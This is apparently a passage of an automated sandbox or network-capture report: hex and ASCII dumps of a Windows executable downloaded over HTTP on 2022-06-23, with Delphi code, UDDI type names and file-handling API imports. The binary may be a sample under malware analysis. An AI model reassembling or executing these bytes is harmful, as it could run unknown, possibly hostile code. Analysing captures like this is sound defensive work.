45 d4 8b 08 ff 11 66 3b 05 30 39 4d 00 75 6d 8b 45 d4 8b 40 04 89 45 ec bb 03 00 00 00 eb 01 43
                  Data Ascii: @ttt.j49MEQtX3T@9MEQtB>D9MEQt(H9MEQtE@E8Eff;$9Mu}uE4E]ff;(9Mu}uE4E>f>>4}*} Ef;09MumE@EC
                  2022-06-23 21:14:28 UTC672INData Raw: 00 0c 8b 4a 00 89 c3 c6 45 f3 00 33 c0 55 68 54 8b 4a 00 64 ff 30 64 89 20 8b 45 fc 8b 70 0c 85 f6 74 20 53 8d 55 bc 8b 45 e8 8b 08 ff 51 20 8b 45 bc 50 8b 45 f4 8b 48 14 8b c6 8b 55 f8 8b 18 ff 53 04 33 c0 5a 59 59 64 89 10 eb 0a e9 c3 ac f5 ff e8 ea b0 f5 ff e8 e5 b0 f5 ff 33 c0 5a 59 59 64 89 10 68 80 8b 4a 00 8b 45 e8 e8 14 a8 f5 ff c3 e9 52 af f5 ff eb f0 33 c0 5a 59 59 64 89 10 68 a2 8b 4a 00 8d 45 bc ba 0b 00 00 00 e8 36 bd f5 ff c3 e9 30 af f5 ff eb eb 8a 45 f3 5f 5e 5b 8b e5 5d c3 ff ff ff ff 18 00 00 00 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 65 72 72 6f 72 2e 00 00 00 00 ff ff ff ff 1a 00 00 00 49 6e 76 61 6c 69 64 20 64 65 63 6c 61 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 00 00 55 8b ec 83 c4 d8 53 56 57 33 db 89 5d f0 89 5d ec 89
                  Data Ascii: JE3UhTJd0d Ept SUEQ EPEHUS3ZYYd3ZYYdhJER3ZYYdhJE60E_^[]Invalid character error.Invalid declaration error.USVW3]]
                  2022-06-23 21:14:28 UTC688INData Raw: 74 03 8b 73 48 8b c3 8b 15 fc f1 46 00 e8 07 6a f5 ff 84 c0 74 03 8b 73 30 85 f6 0f 84 8a 01 00 00 b9 44 cd 4a 00 b2 01 a1 40 85 46 00 e8 3f f6 f5 ff 89 45 f4 33 c0 55 68 74 cb 4a 00 64 ff 30 64 89 20 8b 45 f4 50 8b 45 18 50 8b 4d f8 8b d3 8b c6 8b 18 ff 53 08 33 c0 5a 59 59 64 89 10 68 b2 cc 4a 00 8b 45 f4 e8 19 68 f5 ff c3 e9 57 6f f5 ff eb f0 33 c0 55 68 a5 cb 4a 00 64 ff 30 64 89 20 8d 45 eb 50 8d 4d ec 8b 55 08 8b 45 fc 8b 30 ff 56 4c 33 c0 5a 59 59 64 89 10 eb 20 e9 72 6c f5 ff b9 6c cd 4a 00 b2 01 a1 00 83 46 00 e8 bd f5 f5 ff e8 0c 70 f5 ff e8 83 70 f5 ff 80 7d eb 00 74 16 b9 98 cd 4a 00 b2 01 a1 e4 83 46 00 e8 9c f5 f5 ff e8 eb 6f f5 ff 8d 45 e4 66 8b 15 d8 39 4d 00 e8 e0 7d f5 ff 8b 45 e4 8b 55 ec e8 c5 80 f5 ff 85 c0 7e 16 b9 c8 cd 4a 00 b2 01
                  Data Ascii: tsHFjts0DJ@F?E3UhtJd0d EPEPMS3ZYYdhJEhWo3UhJd0d EPMUE0VL3ZYYd rllJFpp}tJFoEf9M}EU~J
                  2022-06-23 21:14:28 UTC704INData Raw: 8b 15 78 b9 46 00 e8 32 2a f5 ff 83 c0 44 8b d6 e8 d8 3d f5 ff 8b 43 08 8b 15 78 b9 46 00 e8 1a 2a f5 ff 83 c0 40 8b d7 e8 c0 3d f5 ff 5f 5e 5b 5d c2 08 00 00 ff ff ff ff 12 00 00 00 57 72 6f 6e 67 20 6f 72 64 65 72 20 65 72 72 6f 72 2e 00 00 ff ff ff ff 1f 00 00 00 49 6e 76 61 6c 69 64 20 74 65 78 74 2d 64 65 63 6c 61 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 00 55 8b ec 51 53 56 84 d2 74 08 83 c4 f0 e8 0e 2b f5 ff 88 55 ff 8b d8 33 d2 8b c3 e8 64 0b f7 ff 33 c0 89 43 30 b2 01 a1 f8 ee 46 00 e8 ab 27 f5 ff 89 43 34 b2 01 a1 4c eb 46 00 e8 9c 27 f5 ff 89 43 38 b2 01 a1 b8 ec 46 00 e8 8d 27 f5 ff 8b f0 89 73 3c 8b 43 34 89 46 08 8b 43 30 89 46 0c 8b c3 80 7d ff 00 74 0f e8 0b 2b f5 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c3 5e 5b 59 5d c3 8b c0 53 56 e8 01 2b f5
                  Data Ascii: xF2*D=CxF*@=_^[]Wrong order error.Invalid text-declaration error.UQSVt+U3d3C0F'C4LF'C8F's<C4FC0F}t+d^[Y]SV+
                  2022-06-23 21:14:28 UTC720INData Raw: c3 53 56 57 55 e8 f7 eb f4 ff 8b da 8b f0 8b 46 04 8b 10 ff 52 14 8b e8 4d 85 ed 7c 16 45 33 ff 8b 46 04 8b d7 8b 08 ff 51 18 e8 56 e8 f4 ff 47 4d 75 ed 8d 46 04 e8 06 91 f5 ff 8b d3 80 e2 fc 8b c6 e8 2e e8 f4 ff 84 db 7e 07 8b c6 e8 97 eb f4 ff 5d 5f 5e 5b c3 8b c0 53 56 8b f1 8b da 83 3d 38 3a 4d 00 00 75 11 b2 01 a1 b4 48 4b 00 e8 49 ff ff ff a3 38 3a 4d 00 a1 38 3a 4d 00 8b 40 04 8b ce 8b d3 8b 18 ff 53 3c 5e 5b c3 53 56 84 d2 74 08 83 c4 f0 e8 fe ea f4 ff 8b da 8b f0 33 d2 8b c6 e8 fd 1c fb ff c7 46 6c 94 02 00 00 8b c6 84 db 74 0f e8 37 eb f4 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c6 5e 5b c3 55 8b ec 33 c0 55 68 0b 4c 4b 00 64 ff 30 64 89 20 ff 05 ac 5e 4d 00 75 14 b8 34 3a 4d 00 e8 55 90 f5 ff b8 38 3a 4d 00 e8 4b 90 f5 ff 33 c0 5a 59 59 64 89 10 68
                  Data Ascii: SVWUFRM|E3FQVGMuF.~]_^[SV=8:MuHKI8:M8:M@S<^[SVt3Flt7d^[U3UhLKd0d ^Mu4:MU8:MK3ZYYdh
                  2022-06-23 21:14:28 UTC736INData Raw: 56 40 8b 43 40 8b 08 ff 51 08 33 c0 5a 59 59 64 89 10 68 33 8b 4b 00 8d 45 f8 ba 02 00 00 00 e8 a5 b6 f4 ff c3 e9 9f af f4 ff eb eb 5f 5e 5b 59 59 5d c3 8b c0 53 56 e8 c5 ab f4 ff 8b da 8b f0 8b 46 40 e8 3d a8 f4 ff 8b d3 80 e2 fc 8b c6 e8 e1 fc ff ff 84 db 7e 07 8b c6 e8 8a ab f4 ff 5e 5b c3 8d 40 00 55 8b ec 33 c0 55 68 a8 8b 4b 00 64 ff 30 64 89 20 ff 05 64 60 4d 00 75 15 b8 48 3a 4d 00 b9 06 00 00 00 8b 15 dc 11 40 00 e8 f6 c2 f4 ff 33 c0 5a 59 59 64 89 10 68 af 8b 4b 00 c3 e9 23 af f4 ff eb f8 5d c3 8d 40 00 55 8b ec 83 c4 f8 83 2d 64 60 4d 00 01 73 1d a1 84 82 4b 00 89 45 f8 a1 44 83 4b 00 89 45 fc 8d 45 f8 ba 01 00 00 00 e8 a8 22 f6 ff 59 59 5d c3 55 8b ec 33 c0 55 68 09 8c 4b 00 64 ff 30 64 89 20 ff 05 68 60 4d 00 33 c0 5a 59 59 64 89 10 68 10 8c
                  Data Ascii: V@C@Q3ZYYdh3KE_^[YY]SVF@=~^[@U3UhKd0d d`MuH:M@3ZYYdhK#]@U-d`MsKEDKEE"YY]U3UhKd0d h`M3ZYYdh
                  2022-06-23 21:14:28 UTC752INData Raw: 00 8d 45 f8 e8 a8 7d f4 ff c3 e9 ba 6f f4 ff eb f0 5e 5b 59 59 5d c3 8b c0 55 8b ec 83 c4 f8 53 56 33 c9 89 4d f8 8b f2 8b d8 33 c0 55 68 ab cb 4b 00 64 ff 30 64 89 20 8b 43 0c e8 69 e5 ff ff 89 45 fc 33 c0 55 68 8e cb 4b 00 64 ff 30 64 89 20 8b d6 8b 45 fc 8b 08 ff 51 08 8d 55 f8 8b 45 fc e8 37 fd ff ff 8b 55 f8 8d 43 0c e8 7c 7d f4 ff 33 c0 5a 59 59 64 89 10 68 95 cb 4b 00 8b 45 fc e8 ff 67 f4 ff c3 e9 3d 6f f4 ff eb f0 33 c0 5a 59 59 64 89 10 68 b2 cb 4b 00 8d 45 f8 e8 0e 7d f4 ff c3 e9 20 6f f4 ff eb f0 5e 5b 59 59 5d c3 55 8b ec 83 c4 f8 53 56 33 c9 89 4d f8 8b f2 8b d8 33 c0 55 68 43 cc 4b 00 64 ff 30 64 89 20 8b 43 0c e8 d1 e4 ff ff 89 45 fc 33 c0 55 68 26 cc 4b 00 64 ff 30 64 89 20 8b d6 8b 45 fc 8b 08 ff 51 0c 8d 55 f8 8b 45 fc e8 9f fc ff ff 8b
                  Data Ascii: E}o^[YY]USV3M3UhKd0d CiE3UhKd0d EQUE7UC|}3ZYYdhKEg=o3ZYYdhKE} o^[YY]USV3M3UhCKd0d CE3Uh&Kd0d EQUE
                  2022-06-23 21:14:28 UTC768INData Raw: 44 24 04 d4 e9 a4 1d 00 00 83 44 24 04 d4 e9 5e 1b 00 00 83 44 24 04 d4 e9 c8 1e 00 00 83 44 24 04 d4 e9 3a 1d 00 00 83 44 24 04 d4 e9 8c 1f 00 00 83 44 24 04 d4 e9 da 1c 00 00 83 44 24 04 d4 e9 64 20 00 00 83 44 24 04 d4 e9 62 21 00 00 83 44 24 04 d4 e9 f8 20 00 00 83 44 24 04 d4 e9 3e 1a 00 00 83 44 24 04 d4 8b 44 24 04 8b 00 ff 60 04 83 44 24 04 d4 e9 9a 1a 00 00 83 44 24 04 d4 e9 8c 20 00 00 83 c0 d4 e9 dc 21 00 00 83 44 24 04 d4 e9 62 54 f4 ff 83 44 24 04 d4 e9 80 54 f4 ff 83 44 24 04 d4 e9 8a 54 f4 ff cc cc cc 94 0b 4c 00 9e 0b 4c 00 a8 0b 4c 00 a9 0a 4c 00 b3 0a 4c 00 bd 0a 4c 00 c7 0a 4c 00 d1 0a 4c 00 db 0a 4c 00 e8 0a 4c 00 f2 0a 4c 00 fc 0a 4c 00 06 0b 4c 00 10 0b 4c 00 1a 0b 4c 00 24 0b 4c 00 2e 0b 4c 00 38 0b 4c 00 42 0b 4c 00 4c 0b 4c 00 56
                  Data Ascii: D$D$^D$D$:D$D$D$d D$b!D$ D$>D$D$`D$D$ !D$bTD$TD$TLLLLLLLLLLLLLLL$L.L8LBLLLV
                  2022-06-23 21:14:28 UTC784INData Raw: b2 01 a1 74 f8 4b 00 e8 25 da ff ff 8b d0 85 d2 74 03 83 ea d4 8b 45 14 e8 48 14 f4 ff 33 c0 5a 59 59 64 89 10 58 33 db eb 05 e9 d2 ef f3 ff 8b c3 5f 5e 5b 5d c2 10 00 90 55 8b ec 53 56 57 8b 5d 08 8b 45 10 85 c0 74 04 33 d2 89 10 53 33 c0 55 68 a2 4b 4c 00 64 ff 30 64 89 20 53 8b c3 e8 d9 fe ff ff 8b 55 0c 8b 08 ff 91 00 01 00 00 8b c8 b2 01 a1 b4 02 4c 00 e8 b4 d9 ff ff 8b d0 85 d2 74 03 83 ea cc 8b 45 10 e8 d7 13 f4 ff 33 c0 5a 59 59 64 89 10 58 33 db eb 05 e9 61 ef f3 ff 8b c3 5f 5e 5b 5d c2 0c 00 55 8b ec 53 56 57 8b 5d 08 8b 45 10 85 c0 74 04 33 d2 89 10 53 33 c0 55 68 12 4c 4c 00 64 ff 30 64 89 20 53 8b c3 e8 69 fe ff ff 8b 55 0c 8b 08 ff 91 fc 00 00 00 8b c8 b2 01 a1 38 00 4c 00 e8 44 d9 ff ff 8b d0 85 d2 74 03 83 ea d0 8b 45 10 e8 67 13 f4 ff 33
                  Data Ascii: tK%tEH3ZYYdX3_^[]USVW]Et3S3UhKLd0d SULtE3ZYYdX3a_^[]USVW]Et3S3UhLLd0d SiU8LDtEg3
                  2022-06-23 21:14:28 UTC800INData Raw: 80 00 00 00 80 01 00 0b 64 65 73 63 72 69 70 74 69 6f 6e 9c 88 4c 00 14 00 00 ff 14 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 02 00 0c 73 65 72 76 69 63 65 49 6e 66 6f 73 e8 11 40 00 18 00 00 ff 18 00 00 ff 00 00 00 00 00 00 00 80 00 00 00 80 03 00 0b 62 75 73 69 6e 65 73 73 4b 65 79 90 6c 8b 4c 00 11 0d 62 75 73 69 6e 65 73 73 49 6e 66 6f 32 04 00 00 00 00 00 00 00 ff ff ff ff ac 8a 4c 00 0a 69 6e 71 75 69 72 65 5f 76 31 8b c0 e4 8b 4c 00 00 00 00 00 00 00 00 00 f0 8b 4c 00 14 8c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 02 8c 4c 00 10 00 00 00 60 d5 4c 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 0c b1 4c 00 c8 b0 4c 00 0c e5 4c 00 a0 e5 4c 00 0e 00 00 00 00 00 01 00 00 00 68 8b 4c 00 0c 00 00 00 0d 42 75 73
                  Data Ascii: descriptionLserviceInfos@businessKeylLbusinessInfo2Linquire_v1LLLL`L5@5@5@5@5@$3@@3@LLLLhLBus
                  2022-06-23 21:14:28 UTC816INData Raw: 00 00 00 00 00 2a 00 00 00 54 00 4d 00 6f 00 64 00 65 00 6c 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 44 00 65 00 74 00 61 00 69 00 6c 00 73 00 00 00 04 00 00 00 1e 00 00 00 42 00 69 00 6e 00 64 00 69 00 6e 00 67 00 54 00 65 00 6d 00 70 00 6c 00 61 00 74 00 65 00 00 00 20 00 00 00 62 00 69 00 6e 00 64 00 69 00 6e 00 67 00 54 00 65 00 6d 00 70 00 6c 00 61 00 74 00 65 00 32 00 00 00 00 00 1e 00 00 00 62 00 69 00 6e 00 64 00 69 00 6e 00 67 00 54 00 65 00 6d 00 70 00 6c 00 61 00 74 00 65 00 00 00 1a 00 00 00 42 00 69 00 6e 00 64 00 69 00 6e 00 67 00 44 00 65 00 74 00 61 00 69 00 6c 00 00 00 0c 00 00 00 18 00 00 00 44 00 69 00 73 00 63 00 6f 00 76 00 65 00 72 00 79 00 55 00 72 00 6c 00 00 00 00 00 1a 00 00 00 64 00 69 00 73 00 63 00 6f 00 76 00 65 00
                  Data Ascii: *TModelInstanceDetailsBindingTemplate bindingTemplate2bindingTemplateBindingDetailDiscoveryUrldiscove
                  2022-06-23 21:14:28 UTC832INData Raw: 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45 a4 29 00 00 00 c7 45 a4 32 02 00 00 c7 45
                  Data Ascii: E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E)E2E
                  2022-06-23 21:14:28 UTC848INData Raw: 73 61 67 65 41 00 00 00 00 46 69 6e 64 52 65 73 6f 75 72 63 65 41 00 00 00 46 69 6e 64 46 69 72 73 74 46 69 6c 65 41 00 00 00 00 46 69 6e 64 43 6c 6f 73 65 00 00 00 46 69 6c 65 54 69 6d 65 54 6f 4c 6f 63 61 6c 46 69 6c 65 54 69 6d 65 00 00 00 46 69 6c 65 54 69 6d 65 54 6f 44 6f 73 44 61 74 65 54 69 6d 65 00 00 00 45 6e 75 6d 43 61 6c 65 6e 64 61 72 49 6e 66 6f 41 00 00 00 45 6e 74 65 72 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 00 00 44 65 6c 65 74 65 46 69 6c 65 41 00 00 00 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 00 43 72 65 61 74 65 46 69 6c 65 41 00 00 00 43 72 65 61 74 65 45 76 65 6e 74 41 00 00 00 00 43 6f 6d 70 61 72 65 53 74 72 69 6e 67 41 00 00 00 00 43 6c 6f 73
                  Data Ascii: sageAFindResourceAFindFirstFileAFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeEnumCalendarInfoAEnterCriticalSectionDeleteFileADeleteCriticalSectionCreateThreadCreateFileACreateEventACompareStringAClos
                  2022-06-23 21:14:28 UTC864INData Raw: 3e 1a 3f 35 3f 5b 3f 60 3f 88 3f 97 3f d9 3f de 3f 00 70 02 00 4c 00 00 00 7d 30 d1 30 e3 30 1e 31 bc 31 ce 31 17 33 3d 33 6f 34 f1 34 07 37 3c 37 4a 37 80 37 88 38 50 39 6e 39 98 39 dc 39 c9 3a 5c 3b 29 3c 5a 3c b6 3c cd 3c 49 3d 5b 3d 68 3d dd 3d e2 3d 57 3e 63 3e 1f 3f 9d 3f 00 80 02 00 4c 00 00 00 79 30 9e 30 c4 30 32 31 a7 31 74 32 93 32 58 34 87 34 e7 35 8b 36 9b 36 e6 36 17 37 24 37 50 37 55 37 05 38 13 38 a0 38 a9 39 c2 39 1b 3a 36 3a 54 3a d3 3a 1a 3b 57 3b b9 3b fb 3b b0 3c cf 3d d6 3d eb 3d 00 90 02 00 d4 00 00 00 b5 30 5e 32 fe 33 8e 34 43 35 b3 35 0f 36 d7 36 36 37 46 37 59 37 d4 37 e4 37 8c 38 9c 38 16 39 32 39 68 39 7c 39 9f 39 ac 39 bb 39 d9 39 0e 3a 1d 3a 22 3a 3a 3a 3f 3a 4a 3a 59 3a 5f 3a 78 3a 98 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a
                  Data Ascii: >?5?[?`?????pL}0001113=3o447<7J778P9n999:\;)<Z<<<I=[=h===W>c>??Ly000211t22X4456667$7P7U788899:6:T::;W;;;<===0^234C556667F7Y77788929h9|99999::":::?:J:Y:_:x::::::::
                  2022-06-23 21:14:28 UTC880INData Raw: 31 50 31 5a 31 64 31 6a 31 74 31 7a 31 84 31 8f 31 99 31 a4 31 b6 31 cd 31 d9 31 f0 31 fa 31 00 32 07 32 0c 32 1b 32 1f 32 26 32 2b 32 32 32 3d 32 4a 32 4f 32 5b 32 66 32 73 32 78 32 8a 32 e4 32 f4 32 04 33 0c 33 10 33 14 33 18 33 1c 33 20 33 24 33 28 33 2c 33 30 33 34 33 38 33 3c 33 40 33 44 33 48 33 4c 33 50 33 54 33 58 33 5c 33 74 33 8a 33 8e 33 af 33 bb 33 c8 33 da 33 e0 33 f0 33 00 34 08 34 0c 34 10 34 14 34 18 34 1c 34 20 34 24 34 28 34 2c 34 30 34 34 34 38 34 3c 34 40 34 44 34 48 34 4c 34 50 34 54 34 58 34 5c 34 74 34 8b 34 8f 34 a8 34 c9 34 fa 34 20 35 63 35 7e 35 89 35 98 35 aa 35 ca 35 0a 36 3e 36 54 36 5f 36 6e 36 89 36 9b 36 a7 36 b4 36 c6 36 cc 36 e4 36 68 37 b7 37 bb 37 bf 37 c4 37 d4 37 e4 37 ec 37 f0 37 f4 37 f8 37 fc 37 00 38 04 38 08 38
                  Data Ascii: 1P1Z1d1j1t1z111111111122222&2+222=2J2O2[2f2s2x2222333333 3$3(3,3034383<3@3D3H3L3P3T3X3\3t3333333334444444 4$4(4,4044484<4@4D4H4L4P4T4X4\4t444444 5c5~555556>6T6_6n66666666h777777777777888
                  2022-06-23 21:14:28 UTC896INData Raw: 32 75 32 7d 32 a8 32 b0 32 cf 32 d7 32 df 32 37 33 61 33 98 33 a5 33 b4 33 c6 33 d5 33 e7 33 f6 33 08 34 17 34 29 34 38 34 4a 34 59 34 6b 34 7a 34 8c 34 9b 34 ad 34 bc 34 ce 34 dd 34 ef 34 fe 34 10 35 1f 35 31 35 40 35 52 35 61 35 73 35 82 35 94 35 a3 35 b5 35 c4 35 d6 35 e5 35 f7 35 06 36 18 36 27 36 39 36 48 36 5a 36 69 36 7b 36 8a 36 9c 36 ab 36 bd 36 cc 36 de 36 ed 36 ff 36 0e 37 20 37 2f 37 41 37 50 37 62 37 71 37 83 37 92 37 a4 37 b3 37 c5 37 d4 37 e6 37 f5 37 07 38 16 38 28 38 37 38 49 38 58 38 6a 38 79 38 8b 38 9a 38 ac 38 bb 38 cd 38 dc 38 ee 38 fd 38 0f 39 1e 39 30 39 3f 39 51 39 60 39 72 39 81 39 93 39 a2 39 b4 39 c3 39 d5 39 e4 39 f6 39 05 3a 17 3a 26 3a 38 3a 47 3a 59 3a 68 3a 7a 3a 89 3a 9b 3a aa 3a bc 3a cb 3a dd 3a ec 3a fe 3a 0d 3b 1f 3b
                  Data Ascii: 2u2}22222273a3333333344)484J4Y4k4z4444444445515@5R5a5s55555555566'696H6Z6i6{6666666667 7/7A7P7b7q77777777788(878I8X8j8y8888888889909?9Q9`9r999999999::&:8:G:Y:h:z:::::::::;;
                  2022-06-23 21:14:28 UTC912INData Raw: 3a 9c 3a a6 3a ac 3a b6 3a c2 3a c8 3a d2 3a de 3a e4 3a ee 3a fa 3a 00 3b 0a 3b 1a 3b 20 3b 30 3b 36 3b 40 3b 50 3b 56 3b 60 3b 70 3b 76 3b 80 3b 90 3b 96 3b a0 3b b0 3b b6 3b c0 3b c5 3b cf 3b d5 3b df 3b ef 3b f5 3b 05 3c 0b 3c 15 3c 25 3c 2b 3c 35 3c 3a 3c 44 3c 4a 3c 54 3c 64 3c 6a 3c 7a 3c 80 3c 8a 3c 9a 3c a0 3c b0 3c b6 3c c0 3c c5 3c cf 3c d5 3c df 3c ef 3c f5 3c 05 3d 0b 3d 15 3d 1a 3d 28 3d 2e 3d 3e 3d 44 3d 4e 3d 5e 3d 64 3d 74 3d 7a 3d 84 3d 90 3d 96 3d a0 3d b0 3d b6 3d c6 3d cc 3d d6 3d e6 3d ec 3d f6 3d fb 3d 05 3e 0b 3e 15 3e 25 3e 2b 3e 3b 3e 41 3e 4b 3e 5b 3e 61 3e 71 3e 77 3e 81 3e 91 3e 97 3e a1 3e a6 3e b0 3e b6 3e c0 3e d0 3e d6 3e e6 3e ec 3e f6 3e 06 3f 0c 3f 16 3f 1b 3f 25 3f 2b 3f 35 3f 45 3f 4b 3f 5b 3f 61 3f 6b 3f 7b 3f 81 3f
                  Data Ascii: ::::::::::::;;; ;0;6;@;P;V;`;p;v;;;;;;;;;;;;;;<<<%<+<5<:<D<J<T<d<j<z<<<<<<<<<<<<<<====(=.=>=D=N=^=d=t=z==============>>>%>+>;>A>K>[>a>q>w>>>>>>>>>>>>>>????%?+?5?E?K?[?a?k?{??
                  2022-06-23 21:14:28 UTC928INData Raw: 74 8c 77 e1 fe 16 a3 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 25 ce 93 c8 64 74 db f1 c2 9c 8a 78 7e 66 0d 6d f7 28 7a 70 73 41 f1 5b f9 b5 1a e5 96 eb 7c 6a 52 5a 03 6f 7a 6c e2 e9 ed 0a ae 22 a4 f9 66 90 00 f1 3a 39 f2 8c 41 44 82 61 70 82 84 56 f2 a4 ce ce 53 08 47 46 fd 3c 1e 84 d3 59 cc 1d aa 48 f1 c1 62 4b c5 18 57 d8 ba ef ef 71 ab 70 62 d9 d1 32 29 ee f0 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 65 2c 7b e8 05 d5 5f e7 c9 8f 83 ba 82 ce 1e 86 cc a5 40 85 ce c6 00 d8 87 6a d5 55 0b 58 50 df 20 1f 11 f1 55 d4 1e 8e 3d 64 01 8f b6 ab c0
                  Data Ascii: tw%dtx~fm(zpsA[|jRZozl"f:9ADapVSGF<YHbKWqpb2)e,{_@jUXP U=d
                  2022-06-23 21:14:28 UTC944INData Raw: 56 70 db 6f 43 38 f8 2a 4a 7f 75 15 e3 86 c8 d1 82 07 36 23 e2 e2 7a df e1 23 56 3d 46 d9 27 d7 6a 84 28 26 19 4a 2e 1f 87 e9 bd 57 d8 b4 9a db f9 fb db 75 1a 42 e2 0c ee 2f 25 08 53 e8 00 d5 5f 17 c0 2b b2 b5 da 44 4c d2 ed 7b 0b c7 50 a7 2f 12 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 5d d8 8b f6 d1 3f 73 a2 c8 10 d0 08 87 e2 18 f2 d8 2e 87 f1 85 23 fc bf 20 8b d1 68 74 19 31 56 c2 0c ee 34 62 04 da e4 25 3e 58 74 57 54 f7 16 95 31 e1 e6 5a 4c c1 fd 08 8a 00 58 04 ae dd 2b 05 b0 7d 55 ee d3 07 5a eb ee ce af 78 98 74 b9 c6 e0 77 11 5c 03 f2 dd 47 d2 a7 47 f5 26 86 07 95 8c e2 b5 0f 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04
                  Data Ascii: VpoC8*Ju6#z#V=F'j(&J.WuB/%S_+DL{P/]?s.# ht1V4b%>XtWT1ZLX+}UZxtw\GG&
                  2022-06-23 21:14:28 UTC960INData Raw: b0 c3 7c fc 30 f6 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 f4 43 59 44 aa 1f e8 08 16 5a a3 e5 ec 1a 7b d5 77 7a d1 cc bd 62 d9 d9 ef 27 2a 6f 29 09 50 ac 29 40 5f d3 fa b5 73 df 4c 30 6a c2 d6 35 b1 ac 8c 0f 24 ac 47 af dd df da 58 bc b4 79 3a 3a a5 81 c4 c7 86 95 a2 06 8a 71 aa a6 be 75 13 75 93 02 78 17 d6 10 d0 59 d7 30 c3 a8 09 a8 59 a0 a9 80 c2 d8 f7 ff 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 38 71 99 4b 63 d9 c2 31 0d ee e7 b0 8c 77 9c 49 d4 5f d8 7f 55 33 36 b7 2f 69 d6 04 5a 05 1d 14 4c 84 b9 a5 ae dd bc 60 7d 78 1c 02 be 1d 25 61
                  Data Ascii: |0CYDZ{wzb'*o)P)@_sL0j5$GXy::quuxY0Y8qKc1wI_U36/iZL`}x%a
                  2022-06-23 21:14:28 UTC976INData Raw: c1 cf 59 2b 0b bb d5 2d 4c 50 c7 c9 01 41 8a 8b da a9 a6 f4 de ba 5d fb f7 2f cc c5 40 14 5d 47 34 6c a2 a1 2e 55 a3 2d f6 00 30 cb f3 00 0a 31 9c 46 8f b8 66 66 ca 0f 04 c5 ac bf 84 0f 57 b8 af 54 9d 4c d0 3a 82 4a 14 31 fa 9a cf ae 6a d8 60 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 8b 35 d8 93 81 87 9f 78 31 b2 a5 2c 3a cd a4 44 8d 7f 40 fb 54 59 f2 b1 ba 52 1b a3 36 cc cd 3f 14 5d 3f 77 11 d0 c9 a6 d6 df 09 58 91 9c 3b ab fc f5 98 70 df a5 46 6a 0c 9b 43 c0 71 3b f8 27 d4 5f 64 09 8e bb ba 75 b2 16 9e cb cd 71 0c a3 02 00 38 0a f8 b5 63 50 7d 78 9c e5 f0 c6 1e d2 93 cf 5d 3f 0d 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04
                  Data Ascii: Y+-LPA]/@]G4l.U-01FffWTL:J1j`5x1,:D@TYR6?]?wX;pFjCq;'_duq8cP}x]?
